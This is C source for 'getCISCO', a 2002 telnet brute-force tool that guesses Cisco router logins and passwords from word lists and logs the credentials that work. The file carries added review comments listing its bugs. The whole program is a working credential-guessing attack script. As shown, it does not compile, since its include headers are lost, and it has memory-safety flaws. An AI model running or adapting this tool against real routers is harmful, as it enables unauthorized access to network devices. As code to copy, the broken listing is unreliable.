/*
 * getCISCO v1.2 (c) 2002 by ca0s / getREWTED labs
 *
 * ca0s@getrewted.com.ar
 * http://www.getrewted.com.ar
 *
 * Tool to guess valid login/password on a cisco router.
 *
 * Structure of the file (review summary):
 *   - one global TCP socket (sock_stat) is opened by enlace() and then
 *     read/written by loginmode() and sendlogin();
 *   - word lists are read into one malloc'd buffer holding consecutive
 *     NUL-terminated strings (linescounter() sizes it, copytomem() fills
 *     it, get_next_value() walks it);
 *   - main() parses options, validates the inputs and drives the loops.
 * The prompt detection is purely substring-based ("ogin:", "sername:",
 * "assword:" and ">"), see loginmode() and sendlogin().
 */

/*
 * NOTE(review): the header names were lost when this listing was extracted
 * (the "<...>" part of every #include is missing), so the file does not
 * compile as shown. Judging from the calls below it needs at least stdio.h,
 * stdlib.h, string.h, unistd.h, netdb.h, sys/socket.h, netinet/in.h and
 * arpa/inet.h -- confirm against the original source.
 */
#include
#include
#include
#include
#include
#include
#include

#define PROGRAM "getCISCO"
#define VERSION "v1.2"
#define AUTHOR "ca0s / getREWTED labs"
#define EMAIL ""                         /* empty here; the address in the header was presumably stripped with its angle brackets */
#define WEB "http://www.getrewted.com.ar"
#define DEFAULT_PORT 23                  /* telnet */
#define LINESIZE 100                     /* fgets() line buffer; longer lines are split into several entries */
#define CONNBUFF 1000                    /* size of the read() buffers in loginmode()/sendlogin() */

int tempsize;                 /* byte count of the last file measured by linescounter(); read by main() right after the call */
int sock_stat;                /* the single connection socket, (re)opened by enlace() and never closed */
struct sockaddr_in addr;      /* target address, filled in by enlace() */
struct hostent *hp;           /* result of gethostbyname() in enlace(); assigned but never read */
char *optarg;                 /* getopt()'s option argument; normally declared by unistd.h */

/*
 * Print the usage text and exit with status -1 (255).
 * prgname: argv[0], echoed into the text.
 * NOTE(review): the option text below is one long line here; the line
 * breaks were most likely lost in extraction.
 */
void usage(char *prgname)
{
    printf("%s %s (c) 2002 by %s %s Usage: %s [-t HOST:PORT] [[-u LOGIN | -U FILE] [-p PASS | -P FILE] [-C FILE]] [-o FILE]\n", PROGRAM, VERSION, AUTHOR, EMAIL, prgname);
    printf("\nOptions:");
    printf(" -t HOST[:PORT] HOST and PORT to connect to. (default PORT is 23) -u LOGIN login with LOGIN name. -p PASS use password PASS. -U FILE read login names from FILE. -P FILE read passwords from FILE. -C FILE read login and password from FILE. (use USER:PASS format) -o FILE write found login/password to FILE instead of stdout. Find the latest version of %s at %s\n", PROGRAM, WEB);
    exit(-1);
}

/*
 * Print the program banner to stdout.
 * Declared int but never returns a value; the caller ignores the result.
 */
int banner(void)
{
    printf("\n%s %s (c) 2002 by %s %s\n\n", PROGRAM, VERSION, AUTHOR, EMAIL);
}

/*
 * Report a fatal error on stderr and exit with status -1 (255).
 * Every error path in this program ends here; nothing is cleaned up first
 * (the open socket and the malloc'd buffers are simply dropped).
 */
void fail(char *message)
{
    fprintf(stderr, "(!) error: %s\n", message);
    exit(-1);
}

/*
 * Append one "found" record (target, optional username, password) to the
 * log file named by `file`.  The user line is skipped for the "nologin"
 * placeholder that main() uses in password-only mode.
 * Declared int but never returns a value.
 */
int log_found(char *host, int port, char *user, char *pass, char *file)
{
    FILE *fd;
    if ((fd = fopen(file, "a")) == NULL) {
        fail("unable to open the logfile.");
    }
    fprintf(fd, "Target -> [%s:%d]\n", host, port);
    if (strcmp(user, "nologin") != 0) {
        fprintf(fd, "Username: %s\n", user);
    }
    fprintf(fd, "Password: %s\n\n", pass);
    fclose(fd);
}

/*
 * Open a new TCP connection to host:port into the global sock_stat.
 * `logging` is only used as a flag: progress goes to stdout when it is NULL.
 *
 * NOTE(review):
 *   - gethostbyname() is called but its result `hp` is never used; the
 *     address actually connected to is inet_addr(host), so `host` must be a
 *     dotted-quad string -- a hostname would yield INADDR_NONE here.
 *   - the previous socket is not closed before a new one is created, so
 *     every reconnect leaks a descriptor.
 *   - sin_family is set to PF_INET rather than AF_INET (same value on the
 *     common platforms, but AF_INET is the correct constant).
 *   - `err` is only used to hold the connect() result.
 * Declared int but never returns a value.
 */
int enlace(char *host, int port, char *logging)
{
    int err;
    if ((hp = gethostbyname(host)) == NULL)
        fail("failed to resolve host.");
    if ((sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        fail("error opening socket.");
    }
    addr.sin_family = PF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr(host);
    if ((err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr))) < 0) {
        fail("error opening connection.");
    }
    if (logging == NULL)
        printf("* attemping connection to [%s:%d].\n", host, port);
}

/*
 * Read from the fresh connection until a prompt is recognised.
 * Returns 1 if a login/username prompt appears first, 0 if a password
 * prompt appears first.
 *
 * NOTE(review):
 *   - `input` comes from malloc() uninitialised and read() never
 *     NUL-terminates it, so strstr() may scan past the received bytes (and,
 *     for a full CONNBUFF read, past the buffer).
 *   - if the peer closes before either prompt is seen the function falls
 *     off the end with no return value (undefined behaviour for the caller).
 *   - the buffer is never freed.
 */
int loginmode(char *logging)
{
    char *input = malloc(CONNBUFF);
    while (read(sock_stat, input, CONNBUFF) > 0) {
        if(strstr(input,"ogin:") || strstr(input,"sername:")) {
            if (logging == NULL)
                printf("* login requested.\n");
            return 1;
        }
        if(strstr(input,"assword:")) {
            if (logging == NULL)
                printf("* only password needed.\n");
            return 0;
        }
    }
    /* only reached when read() fails or the peer closes */
    memset(input, 0x00, CONNBUFF);
}

/*
 * Send one credential attempt over the global socket and classify the reply.
 *
 * mode 1: write `user`, wait for a line containing "assword", then write
 *         `pass`.  mode 0: write `pass` only.  Each value is followed by
 *         "\r\n".  After a fixed sleep(5) the response is read once:
 *   - a login/username or password prompt  -> return 0 (rejected, the
 *     connection is still usable);
 *   - a ">" anywhere in the output          -> treated as success: print or
 *     log_found(), then exit(0);
 *   - anything else                          -> return 1 (caller reconnects).
 * `logging` doubles as the log-file name and as the "be quiet" flag.
 *
 * NOTE(review):
 *   - all write() results are unchecked and, as in loginmode(), the read()
 *     buffer is never NUL-terminated before strstr().
 *   - the ">" test matches any byte '>' in the received text, not a prompt.
 *   - if read() returns <= 0 the function falls off the end without a
 *     return value.
 *   - the buffer is never freed; on the success path exit(0) is called
 *     from inside this function.
 */
int sendlogin(char *user, char *pass, int mode, char *logging, char *host, int port)
{
    char *input = malloc(CONNBUFF);
    if (mode == 1) {
        if (logging == NULL)
            printf("* sending [%s] and [%s].\n", user, pass);
        write(sock_stat, user, strlen(user));
        write(sock_stat, "\r\n", 2);
        /* wait for the password prompt before sending the password */
        while(read(sock_stat, input, CONNBUFF) > 0) {
            if(strstr(input,"assword")) {
                memset(input, 0x00, CONNBUFF);
                break;
            }
        }
        write(sock_stat, pass, strlen(pass));
        write(sock_stat, "\r\n", 2);
    }
    if (mode == 0) {
        if (logging == NULL)
            printf("* sending [%s].\n", pass);
        write(sock_stat, pass, strlen(pass));
        write(sock_stat, "\r\n", 2);
    }
    sleep(5);
    while (read(sock_stat, input, CONNBUFF) > 0) {
        if (strstr(input,"ogin:") || strstr(input,"sername:")) {
            if (logging == NULL)
                printf("* authentication failed.\n");
            memset(input, 0x00, CONNBUFF);
            return(0);
        } else if (strstr(input,"assword:")) {
            if (logging == NULL)
                printf("* authentication failed.\n");
            memset(input, 0x00, CONNBUFF);
            return(0);
        } else if (strstr(input,">")) {
            if (logging == NULL)
                printf("* seems we are logged in.\n");
            else
                log_found(host, port, user, pass, logging);
            memset(input, 0x00, CONNBUFF);
            printf("\n%s finished.\n", PROGRAM);
            exit(0);
        } else {
            if (logging == NULL)
                printf("* authentication failed.\n");
            memset(input, 0x00, CONNBUFF);
            return(1);
        }
    }
    /* only reached when read() fails or the peer closes */
    memset(input, 0x00, CONNBUFF);
}

/*
 * Count the non-empty lines of `fp` and measure how many bytes they take.
 * Returns the line count; the byte total (+1) is passed back through the
 * global `tempsize`, which main() reads immediately afterwards to size the
 * buffer for copytomem().  The stream is rewound before returning.
 *
 * NOTE(review):
 *   - `fgets(...) != '\0'` compares the pointer against the character
 *     constant 0, i.e. against NULL; it works but reads oddly.
 *   - the `while (!feof(fp))` idiom relies on the inner NULL check to avoid
 *     processing a stale line on the final iteration.
 *   - the malloc'd `line` is never freed.
 *   - lines longer than LINESIZE-1 are counted as several entries.
 */
int linescounter(FILE *fp)
{
    int lines = 0, size = 0;
    char *line = malloc(LINESIZE);
    while (!feof(fp)) {
        if (fgets(line, LINESIZE, fp) != '\0') {
            if (line[0] != 0) {
                size += strlen(line);
                lines++;
            }
        }
    }
    rewind(fp);
    size++;
    tempsize = size;
    return lines;
}

/*
 * Copy every non-empty line of `fp` into `ptr` as consecutive NUL-terminated
 * strings, dropping one trailing '\n' or '\r' per line, then fclose(fp).
 *
 * `ptr` must have been sized from the preceding linescounter() call on the
 * same stream; no length is passed, so nothing here bounds the writes.
 * Only one trailing character is stripped, so a CRLF file leaves the '\r'
 * on each entry.  Takes ownership of `fp` (closes it).
 */
void copytomem(char *ptr, FILE *fp)
{
    char line[LINESIZE];
    memset(line, 0x00, LINESIZE);
    while (!feof(fp)) {
        if (fgets(line, LINESIZE, fp) != NULL) {
            if (line[0] != 0) {
                if (line[strlen(line)-1] == '\n' || line[strlen(line)-1] == '\r')
                    line[strlen(line)-1] = '\0';
                memcpy(ptr, line, strlen(line));
                ptr += strlen(line);
                *ptr = '\0';
                ptr++;
            }
        }
    }
    fclose(fp);
}

/*
 * Advance past the current NUL-terminated string in a copytomem() buffer and
 * return a pointer to the next one.  No bounds check: the caller counts
 * entries with the value returned by linescounter().
 */
char *get_next_value(char *value)
{
    while (*value != '\0')
        value++;
    value++;
    return value;
}

/*
 * Intended to skip to the next "user:pass" pair.
 *
 * NOTE(review): the condition `*pair_ptr != ':' || *pair_ptr != '\0'` is
 * true for every character (a byte cannot equal both), so the first `if`
 * always returns the argument unchanged and the loop is unreachable.  The
 * function is not called anywhere in this file; main() walks pairs inline.
 */
char *get_next_pair(char *pair_ptr)
{
    if (*pair_ptr != ':' || *pair_ptr != '\0')
        return pair_ptr;
    while (*pair_ptr != ':' || *pair_ptr != '\0')
        pair_ptr++;
    pair_ptr++;
    return pair_ptr;
}

/*
 * Entry point.  Phases, in order:
 *   1. getopt parsing (-t -u -p -U -P -C -o), usage() on anything else;
 *   2. split "HOST:PORT" in place and range-check the port;
 *   3. option consistency checks (-C excludes -u/-U/-p/-P; a password
 *      source is mandatory; a missing login defaults to "nologin");
 *   4. truncate and header the -o log file, if any;
 *   5. load the -U / -P / -C files into copytomem() buffers and validate
 *      the "login:password" format of -C entries;
 *   6. connect with enlace(), detect the prompt type with loginmode(), then
 *      loop over the credentials with sendlogin(), reconnecting whenever
 *      sendlogin() returns 1.
 *
 * NOTE(review):
 *   - the "nologin" default is allocated with strlen("nologin") bytes and
 *     filled with memcpy(), so it has no terminating NUL; the later
 *     strcmp(login_ptr, "nologin") reads past the allocation.
 *   - if the router shows a password-only prompt (loginmode() == 0) any
 *     -u/-U value is silently ignored and mode 0 is used.
 *   - the -C loop splits each pair in place by overwriting the ':' with
 *     NUL, so the buffer cannot be re-walked afterwards.
 */
int main(int argc, char *argv[])
{
    FILE *lfp, *pfp, *cfp, *ofp;
    char *target = NULL, *pairfile = NULL, *logfile = NULL, *pass = NULL, *passfile = NULL, *login = NULL, *temp, *loginfile = NULL, *login_ptr, *pass_ptr, *pair_ptr;
    int option, inc, incu, port, countlogin = 1, sizelogin = 0, countpass = 1, sizepass = 0, countpair = 1, sizepair = 0;

    if (argc < 3)
        usage(argv[0]);
    banner();

    /* 1. options */
    while ((option = getopt(argc, argv, "t:u:p:U:P:C:o:")) >= 0) {
        switch (option) {
        case 't': target = optarg; break;
        case 'u': login = optarg; break;
        case 'p': pass = optarg; break;
        case 'U': loginfile = optarg; break;
        case 'P': passfile = optarg; break;
        case 'C': pairfile = optarg; break;
        case 'o': logfile = optarg; break;
        default: usage(argv[0]);
        }
    }

    /* 2. HOST[:PORT] -- the ':' inside argv is overwritten with NUL */
    if (target == NULL)
        fail("option -t is needed.");
    else {
        if (strstr(target, ":") != NULL) {
            temp = target;
            while (*target != ':')
                target++;
            *target = '\0';
            target++;
            port = atoi(target);
            target = temp;
            if (port < 1 || port > 65535)
                fail("port is out of range.");
        } else
            port = DEFAULT_PORT;
    }

    /* 3. option consistency */
    if (pairfile != NULL)
        if ((login != NULL) || (loginfile != NULL) || (pass != NULL) || (passfile != NULL))
            fail("option -C can't be combined with -u -U -p -P.");
    if (pass == NULL)
        if (passfile == NULL)
            if (pairfile == NULL)
                fail("options -p or -P are needed.");
    if (login == NULL)
        if (loginfile == NULL)
            if (pairfile == NULL) {
                /* no room for the terminating NUL here (see review note above) */
                login = malloc(strlen("nologin"));
                memcpy(login, "nologin", strlen("nologin"));
            }

    /* 4. log file: truncated and headed now, appended to by log_found() later */
    if (logfile != NULL) {
        if ((ofp = fopen(logfile, "w")) == NULL)
            fail("unable to open the logfile.");
        fprintf(ofp, "%s %s (c) 2002 by %s %s\n\n", PROGRAM, VERSION, AUTHOR, EMAIL);
        fclose(ofp);
    }

    /* 5. word lists; copytomem() closes each FILE* */
    if (loginfile != NULL) {
        if ((lfp = fopen(loginfile, "r")) == NULL)
            fail("unable to open the logins file.");
        countlogin = linescounter(lfp);
        sizelogin = tempsize;
        if (countlogin == 0)
            fail("file for logins is empty.");
        login_ptr = malloc(sizelogin);
        copytomem(login_ptr, lfp);
    } else
        login_ptr = login;

    if (passfile != NULL) {
        if ((pfp = fopen(passfile, "r")) == NULL)
            fail("unable to open the passwords file.");
        countpass = linescounter(pfp);
        sizepass = tempsize;
        if (countpass == 0)
            fail("file for passwords is empty.");
        pass_ptr = malloc(sizepass);
        copytomem(pass_ptr, pfp);
    } else
        pass_ptr = pass;

    if (pairfile != NULL) {
        if ((cfp = fopen(pairfile, "r")) == NULL)
            fail("unable to open the login:password file.");
        countpair = linescounter(cfp);
        sizepair = tempsize;
        if (countpair == 0)
            fail("file for login:password is empty.");
        pair_ptr = malloc(sizepair);
        copytomem(pair_ptr, cfp);
        /* validation pass: every entry needs a non-empty part on each side of ':' */
        temp = pair_ptr;
        for (inc = 0; inc < countpair; inc++) {
            if (strstr(pair_ptr, ":")) {
                if (*pair_ptr == ':')
                    fail("incorrect format of the login:password file.");
                while (*pair_ptr != ':')
                    pair_ptr++;
                pair_ptr++;
                if (*pair_ptr == '\0')
                    fail("incorrect format of the login:password file.");
                else {
                    while (*pair_ptr != '\0')
                        pair_ptr++;
                    pair_ptr++;
                }
            } else
                fail("incorrect format of the login:password file.");
        }
        pair_ptr = temp;
    }

    /* 6. attempts */
    if (pairfile != NULL) {
        enlace(target, port, logfile);
        if (loginmode(logfile)) {
            for (inc = 0; inc < countpair; inc++) {
                /* split "login:password" in place */
                temp = pair_ptr;
                while (*pair_ptr != ':')
                    pair_ptr++;
                *pair_ptr = '\0';
                pair_ptr++;
                pass = pair_ptr;
                login = temp;
                if (sendlogin(login, pass, 1, logfile, target, port) == 1)
                    enlace(target, port, logfile);
                while (*pair_ptr != '\0')
                    pair_ptr++;
                pair_ptr++;
            }
        } else
            fail("only password needed.");
    } else {
        enlace(target, port, logfile);
        if (loginmode(logfile)) {
            if (!strcmp(login_ptr, "nologin"))
                fail("can't continue whitout a username.");
            /* outer loop over logins, inner loop over the whole password list */
            pass = pass_ptr;
            for (incu = 0; incu < countlogin; incu++) {
                pass_ptr = pass;
                for (inc = 0; inc < countpass; inc++) {
                    if (sendlogin(login_ptr, pass_ptr, 1, logfile, target, port) != 1) {
                        temp = pass_ptr;
                        pass_ptr = get_next_value(temp);
                    } else {
                        temp = pass_ptr;
                        pass_ptr = get_next_value(temp);
                        enlace(target, port, logfile);
                    }
                }
                temp = login_ptr;
                login_ptr = get_next_value(temp);
            }
        } else {
            /* password-only prompt: any -u/-U value is ignored here */
            for (inc = 0; inc < countpass; inc++) {
                if (sendlogin("nologin", pass_ptr, 0, logfile, target, port) != 1) {
                    temp = pass_ptr;
                    pass_ptr = get_next_value(temp);
                } else {
                    temp = pass_ptr;
                    pass_ptr = get_next_value(temp);
                    enlace(target, port, logfile);
                }
            }
        }
    }
}